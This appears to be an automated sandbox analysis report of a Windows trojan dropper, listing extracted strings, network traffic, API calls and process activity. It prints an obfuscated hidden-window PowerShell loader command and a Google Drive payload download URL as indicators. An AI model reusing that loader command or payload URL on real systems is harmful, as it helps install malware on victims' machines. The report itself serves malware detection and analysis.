Source: syrians.exe, 00000008.00000003.3000483871.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988754427.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3023589764.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011677797.0000000005A16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=downloadb0
Source: syrians.exe, 00000008.00000003.2955216092.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=downloadf
Source: syrians.exe, 00000008.00000003.3369585078.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3046064176.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3000483871.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104143779.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3335326380.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988754427.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069511457.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2955334493.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3081539793.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2977951666.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.0000000005A02000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2966271594.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3057211301.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139330187.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011677797.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346992730.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3127766555.0000000005A16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=downloadid
Source: syrians.exe, 00000008.00000003.3369585078.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3335326380.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.0000000005A02000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3302389375.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3324668665.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139330187.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346992730.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3127766555.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279283600.0000000005A15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=downloadn3
Source: syrians.exe, 00000008.00000003.3369585078.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3335326380.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069511457.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3081539793.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.0000000005A02000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3302389375.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3324668665.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3057211301.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346992730.0000000005A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=downloadp3
Source: syrians.exe, 00000008.00000003.3046064176.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104143779.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069511457.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3081539793.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3057211301.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3116395498.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139330187.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3127766555.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279283600.0000000005A15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=downloadt&
Source: syrians.exe, 00000008.00000003.3369585078.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3046064176.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104143779.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3335326380.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069511457.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3081539793.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.0000000005A02000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3302389375.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3324668665.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3023589764.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3057211301.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3116395498.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139330187.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011677797.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346992730.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3127766555.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279283600.0000000005A15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=downloadt0
Source: syrians.exe, 00000008.00000002.3380721457.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/e
Source: syrians.exe, 00000008.00000001.2843443692.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: syrians.exe, 00000008.00000003.3346992730.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3301717329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: syrians.exe, 00000008.00000003.3104143779.0000000005A26000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3161725858.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279283600.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069511457.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139330187.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2943166139.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A26000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279222066.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988754427.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011677797.0000000005A28000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3116395498.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A28000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104143779.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313005550.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3184099773.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2931809139.0000000005A3F000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3081539793.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3057211301.0000000005A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: syrians.exe, 00000008.00000003.3104143779.0000000005A26000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3161725858.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279283600.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069511457.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139330187.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2943166139.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A26000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279222066.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988754427.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011677797.0000000005A28000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3116395498.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A28000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104143779.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313005550.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3184099773.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2931809139.0000000005A3F000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3081539793.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3057211301.0000000005A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: syrians.exe, 00000008.00000003.3104143779.0000000005A26000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3161725858.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279283600.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069511457.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139330187.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2943166139.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A26000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279222066.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988754427.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011677797.0000000005A28000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3116395498.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A28000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104143779.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313005550.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3184099773.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2931809139.0000000005A3F000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3081539793.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3057211301.0000000005A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: syrians.exe, 00000008.00000003.3346992730.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3301717329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: syrians.exe, 00000008.00000003.3346992730.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3301717329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: syrians.exe, 00000008.00000003.3346992730.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3301717329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: syrians.exe, 00000008.00000003.3346992730.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3301717329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 54045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54059
Source: unknown	Network traffic detected: HTTP traffic on port 54051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54057
Source: unknown	Network traffic detected: HTTP traffic on port 54055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54064
Source: unknown	Network traffic detected: HTTP traffic on port 54080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54069
Source: unknown	Network traffic detected: HTTP traffic on port 54050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54068
Source: unknown	Network traffic detected: HTTP traffic on port 54079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54073
Source: unknown	Network traffic detected: HTTP traffic on port 54060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54075
Source: unknown	Network traffic detected: HTTP traffic on port 54064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54070
Source: unknown	Network traffic detected: HTTP traffic on port 54047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54079
Source: unknown	Network traffic detected: HTTP traffic on port 54072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54084
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54044
Source: unknown	Network traffic detected: HTTP traffic on port 54067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54080
Source: unknown	Network traffic detected: HTTP traffic on port 54063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54049
Source: unknown	Network traffic detected: HTTP traffic on port 54052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54048
Source: unknown	Network traffic detected: HTTP traffic on port 54077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54046
Source: unknown	Network traffic detected: HTTP traffic on port 54056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54051
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54053
Source: unknown	Network traffic detected: HTTP traffic on port 54062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54083 -> 443

Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.6:54045 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54050 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54056 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54067 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54075 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54083 version: TLS 1.2

Source: C:\Users\user\Desktop\7uY105UTJU.exe

Code function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040571B

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\syrians.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\7uY105UTJU.exe

Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403532

Source: C:\Users\user\Desktop\7uY105UTJU.exe	Code function: 0_2_00406DC6		0_2_00406DC6
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Code function: 0_2_0040759D		0_2_0040759D

Source: 7uY105UTJU.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/13@3/2

Source: C:\Users\user\Desktop\7uY105UTJU.exe

0_2_00403532

Source: C:\Users\user\Desktop\7uY105UTJU.exe

Code function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004049C7

Source: C:\Users\user\Desktop\7uY105UTJU.exe

Code function: 0_2_004021AF CoCreateInstance,

0_2_004021AF

Source: C:\Users\user\Desktop\7uY105UTJU.exe

File created: C:\Users\user\AppData\Roaming\erstatningsgraden

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:120:WilError_03

Source: C:\Users\user\Desktop\7uY105UTJU.exe

File created: C:\Users\user\AppData\Local\Temp\nslFF4F.tmp

Jump to behavior

Source: 7uY105UTJU.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\7uY105UTJU.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\7uY105UTJU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7uY105UTJU.exe	ReversingLabs: Detection: 50%
Source: 7uY105UTJU.exe	Virustotal: Detection: 60%

Source: C:\Users\user\Desktop\7uY105UTJU.exe

File read: C:\Users\user\Desktop\7uY105UTJU.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\7uY105UTJU.exe "C:\Users\user\Desktop\7uY105UTJU.exe"
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$johannine=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Successively.Ton';$Elitism=$johannine.SubString(69953,3);.$Elitism($johannine) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\syrians.exe "C:\Users\user\AppData\Local\Temp\syrians.exe"
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$johannine=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Successively.Ton';$Elitism=$johannine.SubString(69953,3);.$Elitism($johannine) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\syrians.exe "C:\Users\user\AppData\Local\Temp\syrians.exe"	Jump to behavior

Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Section loaded: oleacc.dll	Jump to behavior
